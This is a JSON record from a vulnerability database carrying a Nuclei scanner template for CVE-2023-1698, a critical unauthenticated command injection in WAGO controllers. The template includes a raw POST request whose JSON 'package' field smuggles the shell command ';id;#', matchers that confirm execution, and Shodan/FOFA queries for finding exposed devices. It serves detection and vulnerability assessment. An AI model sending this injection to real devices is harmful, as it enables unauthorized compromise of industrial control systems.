{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-1698/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-1698/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-1698/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-1698/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-1698/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-1698"},"sightings":{"href":"/api/v1/sightings/cve-2023-1698"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-1698.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-1698\n\ninfo:\n  name: WAGO - Remote Command Execution\n  author: xianke\n  severity: critical\n  description: |\n    In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.\n  remediation: |\n    Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.\n  reference:\n    - https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-1698\n    - https://cert.vde.com/en/advisories/VDE-2023-007/\n    - https://github.com/codeb0ss/CVE-2023-1698-PoC\n    - https://github.com/deIndra/CVE-2023-1698\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-1698\n    cwe-id: CWE-78\n    epss-score: 0.82037\n    epss-percentile: 0.99644\n    cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: wago\n    product: compact_controller_100_firmware\n    shodan-query:\n      - html:\"/wbm/\" html:\"wago\"\n      - http.html:\"/wbm/\" html:\"wago\"\n    fofa-query: body=\"/wbm/\" html:\"wago\"\n  tags: cve2023,cve,wago,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        {\"package\":\";id;#\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"license\":'\n          - '\"name\":'\n          - 'uid='\n          - 'gid='\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a0048304602210085fdc8d7f519f659f494d3acb277823ed9bf8d7a2b1d011588811779a51e8f53022100d5f150dee8180bc774f7c4f6b3313d7b1805c33b197434e9697668729e1ab04f:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2023-1698"}